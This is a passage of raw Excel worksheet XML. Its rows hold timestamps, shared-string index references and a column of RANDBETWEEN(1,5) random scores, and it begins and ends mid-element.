      <c r="F7606">
        <f t="shared" ca="1" si="118"/>
        <v>4</v>
      </c>
    </row>
    <row r="7607" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A7607" s="1">
        <v>43406.604479166665</v>
      </c>
      <c r="C7607" t="s">
        <v>10</v>
      </c>
      <c r="D7607" t="s">
        <v>6</v>
      </c>
      <c r="E7607" s="2" t="s">
        <v>6751</v>
      </c>
      <c r="F7607">
        <f t="shared" ca="1" si="118"/>
        <v>1</v>
      </c>
    </row>
    <row r="7608" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A7608" s="1">
        <v>43406.596724537034</v>
      </c>
      <c r="C7608" t="s">
        <v>189</v>
      </c>
      <c r="E7608" s="2" t="s">
        <v>6752</v>
      </c>
      <c r="F7608">
        <f t="shared" ca="1" si="118"/>
        <v>5</v>
      </c>
    </row>
    <row r="7609" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7609" s="1">
        <v>43406.594270833331</v>
      </c>
      <c r="C7609" t="s">
        <v>10</v>
      </c>
      <c r="D7609" t="s">
        <v>229</v>
      </c>
      <c r="E7609" t="s">
        <v>6753</v>
      </c>
      <c r="F7609">
        <f t="shared" ca="1" si="118"/>
        <v>4</v>
      </c>
    </row>
    <row r="7610" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A7610" s="1">
        <v>43406.586342592593</v>
      </c>
      <c r="C7610" t="s">
        <v>6</v>
      </c>
      <c r="D7610" t="s">
        <v>25</v>
      </c>
      <c r="E7610" s="2" t="s">
        <v>6754</v>
      </c>
      <c r="F7610">
        <f t="shared" ca="1" si="118"/>
        <v>4</v>
      </c>
    </row>
    <row r="7611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7611" s="1">
        <v>43406.582013888888</v>
      </c>
      <c r="C7611" t="s">
        <v>10</v>
      </c>
      <c r="D7611" t="s">
        <v>381</v>
      </c>
      <c r="E7611" t="s">
        <v>6755</v>
      </c>
      <c r="F7611">
        <f t="shared" ca="1" si="118"/>
        <v>3</v>
      </c>
    </row>
    <row r="7612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7612" s="1">
        <v>43406.575486111113</v>
      </c>
      <c r="C7612" t="s">
        <v>479</v>
      </c>
      <c r="D7612" t="s">
        <v>1036</v>
      </c>
      <c r="E7612" t="s">
        <v>3995</v>
      </c>
      <c r="F7612">
        <f t="shared" ca="1" si="118"/>
        <v>2</v>
      </c>
    </row>
    <row r="7613" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A7613" s="1">
        <v>43406.569201388891</v>
      </c>
      <c r="C7613" t="s">
        <v>6</v>
      </c>
      <c r="D7613" t="s">
        <v>25</v>
      </c>
      <c r="E7613" s="2" t="s">
        <v>6756</v>
      </c>
      <c r="F7613">
        <f t="shared" ca="1" si="118"/>
        <v>4</v>
      </c>
    </row>
    <row r="7614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7614" s="1">
        <v>43406.563564814816</v>
      </c>
      <c r="C7614" t="s">
        <v>10</v>
      </c>
      <c r="D7614" t="s">
        <v>36</v>
      </c>
      <c r="E7614" t="s">
        <v>6757</v>
      </c>
      <c r="F7614">
        <f t="shared" ca="1" si="118"/>
        <v>2</v>
      </c>
    </row>
    <row r="7615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7615" s="1">
        <v>43406.548344907409</v>
      </c>
      <c r="C7615" t="s">
        <v>10</v>
      </c>
      <c r="D7615" t="s">
        <v>33</v>
      </c>
      <c r="E7615" t="s">
        <v>6758</v>
      </c>
      <c r="F7615">
        <f t="shared" ca="1" si="118"/>
        <v>1</v>
      </c>
    </row>
    <row r="7616" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7616" s="1">
        <v>43406.54791666667</v>
      </c>
      <c r="C7616" t="s">
        <v>10</v>
      </c>
      <c r="D7616" t="s">
        <v>17</v>
      </c>
      <c r="E7616" t="s">
        <v>6759</v>
      </c>
      <c r="F7616">
        <f t="shared" ca="1" si="118"/>
        <v>2</v>
      </c>
    </row>
    <row r="7617" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7617" s="1">
        <v>43406.472627314812</v>
      </c>
      <c r="C7617" t="s">
        <v>10</v>
      </c>
      <c r="D7617" t="s">
        <v>163</v>
      </c>
      <c r="E7617" t="s">
        <v>6760</v>
      </c>
      <c r="F7617">
        <f t="shared" ca="1" si="118"/>
        <v>3</v>
      </c>
    </row>
    <row r="7618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7618" s="1">
        <v>43406.472511574073</v>
      </c>
      <c r="C7618" t="s">
        <v>10</v>
      </c>
      <c r="D7618" t="s">
        <v>163</v>
      </c>
      <c r="E7618" t="s">
        <v>6760</v>
      </c>
      <c r="F7618">
        <f t="shared" ref="F7618:F7681" ca="1" si="119">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="7619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7619" s="1">
        <v>43406.44363425926</v>
      </c>
      <c r="C7619" t="s">
        <v>10</v>
      </c>
      <c r="D7619" t="s">
        <v>80</v>
      </c>
      <c r="E7619" t="s">
        <v>6761</v>
      </c>
      <c r="F7619">
        <f t="shared" ca="1" si="119"/>
        <v>1</v>
      </c>
    </row>
    <row r="7620" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A7620" s="1">
        <v>43406.443576388891</v>
      </c>
      <c r="C7620" t="s">
        <v>10</v>
      </c>
      <c r="D7620" t="s">
        <v>20</v>
      </c>
      <c r="E7620" s="2" t="s">
        <v>6763</v>
      </c>
      <c r="F7620">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7621" s="1">
        <v>43406.430231481485</v>
      </c>
      <c r="C7621" t="s">
        <v>41</v>
      </c>
      <c r="E7621">
        <v>9603499089</v>
      </c>
      <c r="F7621">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7622" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7622" s="1">
        <v>43406.424490740741</v>
      </c>
      <c r="C7622" t="s">
        <v>48</v>
      </c>
      <c r="E7622" t="s">
        <v>6764</v>
      </c>
      <c r="F7622">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7623" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A7623" s="1">
        <v>43406.422326388885</v>
      </c>
      <c r="C7623" t="s">
        <v>1381</v>
      </c>
      <c r="E7623" s="2" t="s">
        <v>6765</v>
      </c>
      <c r="F7623">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7624" s="1">
        <v>43406.413298611114</v>
      </c>
      <c r="C7624" t="s">
        <v>10</v>
      </c>
      <c r="D7624" t="s">
        <v>151</v>
      </c>
      <c r="E7624" t="s">
        <v>6766</v>
      </c>
      <c r="F7624">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7625" s="1">
        <v>43406.404398148145</v>
      </c>
      <c r="C7625" t="s">
        <v>10</v>
      </c>
      <c r="D7625" t="s">
        <v>290</v>
      </c>
      <c r="E7625" t="s">
        <v>6767</v>
      </c>
      <c r="F7625">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7626" s="1">
        <v>43406.392685185187</v>
      </c>
      <c r="C7626" t="s">
        <v>48</v>
      </c>
      <c r="E7626" t="s">
        <v>6768</v>
      </c>
      <c r="F7626">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7627" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A7627" s="1">
        <v>43406.372233796297</v>
      </c>
      <c r="C7627" t="s">
        <v>41</v>
      </c>
      <c r="E7627" s="2" t="s">
        <v>6769</v>
      </c>
      <c r="F7627">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7628" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7628" s="1">
        <v>43406.351527777777</v>
      </c>
      <c r="C7628" t="s">
        <v>17</v>
      </c>
      <c r="E7628" t="s">
        <v>6770</v>
      </c>
      <c r="F7628">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7629" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A7629" s="1">
        <v>43406.338460648149</v>
      </c>
      <c r="C7629" t="s">
        <v>10</v>
      </c>
      <c r="E7629" s="2" t="s">
        <v>6771</v>
      </c>
      <c r="F7629">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7630" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A7630" s="1">
        <v>43406.332812499997</v>
      </c>
      <c r="C7630" t="s">
        <v>43</v>
      </c>
      <c r="E7630" s="2" t="s">
        <v>6772</v>
      </c>
      <c r="F7630">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7631" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7631" s="1">
        <v>43406.331574074073</v>
      </c>
      <c r="C7631" t="s">
        <v>41</v>
      </c>
      <c r="E7631" t="s">
        <v>6773</v>
      </c>
      <c r="F7631">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7632" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A7632" s="1">
        <v>43406.33011574074</v>
      </c>
      <c r="C7632" t="s">
        <v>48</v>
      </c>
      <c r="E7632" s="2" t="s">
        <v>6774</v>
      </c>
      <c r="F7632">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7633" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7633" s="1">
        <v>43406.300763888888</v>
      </c>
      <c r="C7633" t="s">
        <v>776</v>
      </c>
      <c r="E7633" s="2" t="s">
        <v>6775</v>
      </c>
      <c r="F7633">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7634" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A7634" s="1">
        <v>43406.297881944447</v>
      </c>
      <c r="C7634" t="s">
        <v>63</v>
      </c>
      <c r="E7634" s="2" t="s">
        <v>6776</v>
      </c>
      <c r="F7634">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7635" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A7635" s="1">
        <v>43406.297824074078</v>
      </c>
      <c r="C7635" t="s">
        <v>65</v>
      </c>
      <c r="E7635" s="2" t="s">
        <v>6777</v>
      </c>
      <c r="F7635">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7636" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7636" s="1">
        <v>43406.293645833335</v>
      </c>
      <c r="C7636" t="s">
        <v>301</v>
      </c>
      <c r="D7636" t="s">
        <v>33</v>
      </c>
      <c r="E7636" t="s">
        <v>4337</v>
      </c>
      <c r="F7636">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7637" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A7637" s="1">
        <v>43406.268761574072</v>
      </c>
      <c r="C7637" t="s">
        <v>10</v>
      </c>
      <c r="D7637" t="s">
        <v>36</v>
      </c>
      <c r="E7637" s="2" t="s">
        <v>6778</v>
      </c>
      <c r="F7637">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7638" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7638" s="1">
        <v>43406.264178240737</v>
      </c>
      <c r="C7638" t="s">
        <v>140</v>
      </c>
      <c r="D7638" t="s">
        <v>141</v>
      </c>
      <c r="E7638" s="2" t="s">
        <v>6779</v>
      </c>
      <c r="F7638">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7639" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7639" s="1">
        <v>43406.262800925928</v>
      </c>
      <c r="C7639" t="s">
        <v>140</v>
      </c>
      <c r="D7639" t="s">
        <v>141</v>
      </c>
      <c r="E7639" s="2" t="s">
        <v>6780</v>
      </c>
      <c r="F7639">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7640" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A7640" s="1">
        <v>43406.262106481481</v>
      </c>
      <c r="C7640" t="s">
        <v>124</v>
      </c>
      <c r="E7640" s="2" t="s">
        <v>6781</v>
      </c>
      <c r="F7640">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7641" s="1">
        <v>43406.251944444448</v>
      </c>
      <c r="C7641" t="s">
        <v>43</v>
      </c>
      <c r="D7641" t="s">
        <v>178</v>
      </c>
      <c r="E7641" t="s">
        <v>4337</v>
      </c>
      <c r="F7641">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7642" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A7642" s="1">
        <v>43406.249594907407</v>
      </c>
      <c r="C7642" t="s">
        <v>189</v>
      </c>
      <c r="E7642" s="2" t="s">
        <v>6782</v>
      </c>
      <c r="F7642">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7643" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A7643" s="1">
        <v>43406.247372685182</v>
      </c>
      <c r="C7643" t="s">
        <v>41</v>
      </c>
      <c r="E7643" s="2" t="s">
        <v>6783</v>
      </c>
      <c r="F7643">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7644" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A7644" s="1">
        <v>43406.245972222219</v>
      </c>
      <c r="C7644" t="s">
        <v>41</v>
      </c>
      <c r="E7644" s="2" t="s">
        <v>6784</v>
      </c>
      <c r="F7644">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7645" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7645" s="1">
        <v>43406.243564814817</v>
      </c>
      <c r="C7645" t="s">
        <v>140</v>
      </c>
      <c r="D7645" t="s">
        <v>141</v>
      </c>
      <c r="E7645" s="2" t="s">
        <v>6785</v>
      </c>
      <c r="F7645">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7646" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7646" s="1">
        <v>43406.241203703707</v>
      </c>
      <c r="C7646" t="s">
        <v>140</v>
      </c>
      <c r="D7646" t="s">
        <v>141</v>
      </c>
      <c r="E7646" s="2" t="s">
        <v>6786</v>
      </c>
      <c r="F7646">
        <f t="shared" ca="1" si="119"/>
        <v>1</v>
      </c>
    </row>
    <row r="7647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7647" s="1">
        <v>43406.232835648145</v>
      </c>
      <c r="C7647" t="s">
        <v>48</v>
      </c>
      <c r="E7647" t="s">
        <v>6787</v>
      </c>
      <c r="F7647">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7648" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7648" s="1">
        <v>43406.222638888888</v>
      </c>
      <c r="C7648" t="s">
        <v>140</v>
      </c>
      <c r="D7648" t="s">
        <v>141</v>
      </c>
      <c r="E7648" s="2" t="s">
        <v>6788</v>
      </c>
      <c r="F7648">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7649" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A7649" s="1">
        <v>43406.220335648148</v>
      </c>
      <c r="C7649" t="s">
        <v>140</v>
      </c>
      <c r="D7649" t="s">
        <v>141</v>
      </c>
      <c r="E7649" s="2" t="s">
        <v>6789</v>
      </c>
      <c r="F7649">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7650" s="1">
        <v>43406.201770833337</v>
      </c>
      <c r="C7650" t="s">
        <v>41</v>
      </c>
      <c r="E7650" t="s">
        <v>6790</v>
      </c>
      <c r="F7650">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7651" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A7651" s="1">
        <v>43406.201597222222</v>
      </c>
      <c r="C7651" t="s">
        <v>140</v>
      </c>
      <c r="D7651" t="s">
        <v>141</v>
      </c>
      <c r="E7651" s="2" t="s">
        <v>6791</v>
      </c>
      <c r="F7651">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7652" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7652" s="1">
        <v>43406.199837962966</v>
      </c>
      <c r="C7652" t="s">
        <v>140</v>
      </c>
      <c r="D7652" t="s">
        <v>141</v>
      </c>
      <c r="E7652" s="2" t="s">
        <v>6792</v>
      </c>
      <c r="F7652">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7653" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A7653" s="1">
        <v>43406.185856481483</v>
      </c>
      <c r="C7653" t="s">
        <v>71</v>
      </c>
      <c r="E7653" s="2" t="s">
        <v>6793</v>
      </c>
      <c r="F7653">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7654" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A7654" s="1">
        <v>43406.181354166663</v>
      </c>
      <c r="C7654" t="s">
        <v>140</v>
      </c>
      <c r="D7654" t="s">
        <v>141</v>
      </c>
      <c r="E7654" s="2" t="s">
        <v>6794</v>
      </c>
      <c r="F7654">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7655" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A7655" s="1">
        <v>43406.180138888885</v>
      </c>
      <c r="C7655" t="s">
        <v>140</v>
      </c>
      <c r="D7655" t="s">
        <v>141</v>
      </c>
      <c r="E7655" s="2" t="s">
        <v>6795</v>
      </c>
      <c r="F7655">
        <f t="shared" ca="1" si="119"/>
        <v>1</v>
      </c>
    </row>
    <row r="7656" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7656" s="1">
        <v>43406.162048611113</v>
      </c>
      <c r="C7656" t="s">
        <v>140</v>
      </c>
      <c r="D7656" t="s">
        <v>141</v>
      </c>
      <c r="E7656" t="s">
        <v>6796</v>
      </c>
      <c r="F7656">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7657" s="1">
        <v>43406.148865740739</v>
      </c>
      <c r="C7657" t="s">
        <v>471</v>
      </c>
      <c r="E7657" t="s">
        <v>6797</v>
      </c>
      <c r="F7657">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7658" s="1">
        <v>43406.104849537034</v>
      </c>
      <c r="C7658" t="s">
        <v>5239</v>
      </c>
      <c r="D7658" t="s">
        <v>36</v>
      </c>
      <c r="E7658" t="s">
        <v>4337</v>
      </c>
      <c r="F7658">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7659" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7659" s="1">
        <v>43406.099421296298</v>
      </c>
      <c r="C7659" t="s">
        <v>151</v>
      </c>
      <c r="D7659" t="s">
        <v>602</v>
      </c>
      <c r="E7659" t="s">
        <v>6476</v>
      </c>
      <c r="F7659">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7660" s="1">
        <v>43406.051342592589</v>
      </c>
      <c r="C7660" t="s">
        <v>10</v>
      </c>
      <c r="D7660" t="s">
        <v>107</v>
      </c>
      <c r="E7660" t="s">
        <v>6798</v>
      </c>
      <c r="F7660">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7661" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7661" s="1">
        <v>43406.028865740744</v>
      </c>
      <c r="C7661" t="s">
        <v>41</v>
      </c>
      <c r="E7661" t="s">
        <v>6799</v>
      </c>
      <c r="F7661">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7662" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A7662" s="1">
        <v>43405.975219907406</v>
      </c>
      <c r="C7662" t="s">
        <v>10</v>
      </c>
      <c r="E7662" s="2" t="s">
        <v>6800</v>
      </c>
      <c r="F7662">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7663" s="1">
        <v>43405.906770833331</v>
      </c>
      <c r="C7663" t="s">
        <v>314</v>
      </c>
      <c r="E7663" t="s">
        <v>6801</v>
      </c>
      <c r="F7663">
        <f t="shared" ca="1" si="119"/>
        <v>1</v>
      </c>
    </row>
    <row r="7664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7664" s="1">
        <v>43405.810081018521</v>
      </c>
      <c r="C7664" t="s">
        <v>140</v>
      </c>
      <c r="D7664" t="s">
        <v>141</v>
      </c>
      <c r="E7664" t="s">
        <v>6802</v>
      </c>
      <c r="F7664">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7665" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A7665" s="1">
        <v>43405.753171296295</v>
      </c>
      <c r="C7665" t="s">
        <v>10</v>
      </c>
      <c r="D7665" t="s">
        <v>52</v>
      </c>
      <c r="E7665" s="2" t="s">
        <v>6803</v>
      </c>
      <c r="F7665">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7666" s="1">
        <v>43405.737673611111</v>
      </c>
      <c r="C7666" t="s">
        <v>10</v>
      </c>
      <c r="D7666" t="s">
        <v>11</v>
      </c>
      <c r="E7666" t="s">
        <v>6804</v>
      </c>
      <c r="F7666">
        <f t="shared" ca="1" si="119"/>
        <v>1</v>
      </c>
    </row>
    <row r="7667" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A7667" s="1">
        <v>43405.707777777781</v>
      </c>
      <c r="C7667" t="s">
        <v>10</v>
      </c>
      <c r="D7667" t="s">
        <v>6</v>
      </c>
      <c r="E7667" s="2" t="s">
        <v>6805</v>
      </c>
      <c r="F7667">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7668" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A7668" s="1">
        <v>43405.690775462965</v>
      </c>
      <c r="C7668" t="s">
        <v>6</v>
      </c>
      <c r="D7668" t="s">
        <v>25</v>
      </c>
      <c r="E7668" s="2" t="s">
        <v>6806</v>
      </c>
      <c r="F7668">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7669" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A7669" s="1">
        <v>43405.686041666668</v>
      </c>
      <c r="C7669" t="s">
        <v>10</v>
      </c>
      <c r="D7669" t="s">
        <v>107</v>
      </c>
      <c r="E7669" s="2" t="s">
        <v>6807</v>
      </c>
      <c r="F7669">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7670" s="1">
        <v>43405.672766203701</v>
      </c>
      <c r="C7670" t="s">
        <v>10</v>
      </c>
      <c r="D7670" t="s">
        <v>33</v>
      </c>
      <c r="E7670" t="s">
        <v>6808</v>
      </c>
      <c r="F7670">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7671" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7671" s="1">
        <v>43405.652384259258</v>
      </c>
      <c r="C7671" t="s">
        <v>10</v>
      </c>
      <c r="D7671" t="s">
        <v>80</v>
      </c>
      <c r="E7671" t="s">
        <v>6809</v>
      </c>
      <c r="F7671">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7672" s="1">
        <v>43405.613055555557</v>
      </c>
      <c r="C7672" t="s">
        <v>10</v>
      </c>
      <c r="D7672" t="s">
        <v>271</v>
      </c>
      <c r="E7672" t="s">
        <v>6810</v>
      </c>
      <c r="F7672">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7673" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A7673" s="1">
        <v>43405.594467592593</v>
      </c>
      <c r="C7673" t="s">
        <v>6</v>
      </c>
      <c r="D7673" t="s">
        <v>25</v>
      </c>
      <c r="E7673" s="2" t="s">
        <v>6811</v>
      </c>
      <c r="F7673">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7674" s="1">
        <v>43405.589918981481</v>
      </c>
      <c r="C7674" t="s">
        <v>6</v>
      </c>
      <c r="D7674" t="s">
        <v>25</v>
      </c>
      <c r="E7674" t="s">
        <v>6812</v>
      </c>
      <c r="F7674">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7675" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7675" s="1">
        <v>43405.536759259259</v>
      </c>
      <c r="C7675" t="s">
        <v>10</v>
      </c>
      <c r="D7675" t="s">
        <v>6</v>
      </c>
      <c r="E7675" t="s">
        <v>6813</v>
      </c>
      <c r="F7675">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7676" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A7676" s="1">
        <v>43405.520335648151</v>
      </c>
      <c r="C7676" t="s">
        <v>48</v>
      </c>
      <c r="E7676" s="2" t="s">
        <v>6814</v>
      </c>
      <c r="F7676">
        <f t="shared" ca="1" si="119"/>
        <v>1</v>
      </c>
    </row>
    <row r="7677" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A7677" s="1">
        <v>43405.504074074073</v>
      </c>
      <c r="C7677" t="s">
        <v>82</v>
      </c>
      <c r="E7677" s="2" t="s">
        <v>6815</v>
      </c>
      <c r="F7677">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7678" s="1">
        <v>43405.502395833333</v>
      </c>
      <c r="C7678" t="s">
        <v>48</v>
      </c>
      <c r="E7678" t="s">
        <v>6816</v>
      </c>
      <c r="F7678">
        <f t="shared" ca="1" si="119"/>
        <v>4</v>
      </c>
    </row>
    <row r="7679" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7679" s="1">
        <v>43405.502384259256</v>
      </c>
      <c r="C7679" t="s">
        <v>48</v>
      </c>
      <c r="E7679" t="s">
        <v>6816</v>
      </c>
      <c r="F7679">
        <f t="shared" ca="1" si="119"/>
        <v>2</v>
      </c>
    </row>
    <row r="7680" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A7680" s="1">
        <v>43405.466296296298</v>
      </c>
      <c r="C7680" t="s">
        <v>63</v>
      </c>
      <c r="E7680" s="2" t="s">
        <v>6817</v>
      </c>
      <c r="F7680">
        <f t="shared" ca="1" si="119"/>
        <v>5</v>
      </c>
    </row>
    <row r="7681" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7681" s="1">
        <v>43405.44636574074</v>
      </c>
      <c r="C7681" t="s">
        <v>10</v>
      </c>
      <c r="D7681" t="s">
        <v>80</v>
      </c>
      <c r="E7681" s="2" t="s">
        <v>6818</v>
      </c>
      <c r="F7681">
        <f t="shared" ca="1" si="119"/>
        <v>3</v>
      </c>
    </row>
    <row r="7682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7682" s="1">
        <v>43405.442696759259</v>
      </c>
      <c r="C7682" t="s">
        <v>48</v>
      </c>
      <c r="E7682" t="s">
        <v>6819</v>
      </c>
      <c r="F7682">
        <f t="shared" ref="F7682:F7745" ca="1" si="120">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="7683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7683" s="1">
        <v>43405.43959490741</v>
      </c>
      <c r="C7683" t="s">
        <v>10</v>
      </c>
      <c r="D7683" t="s">
        <v>336</v>
      </c>
      <c r="E7683" t="s">
        <v>6820</v>
      </c>
      <c r="F7683">
        <f t="shared" ca="1" si="120"/>
        <v>4</v>
      </c>
    </row>
    <row r="7684" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A7684" s="1">
        <v>43405.431157407409</v>
      </c>
      <c r="C7684" t="s">
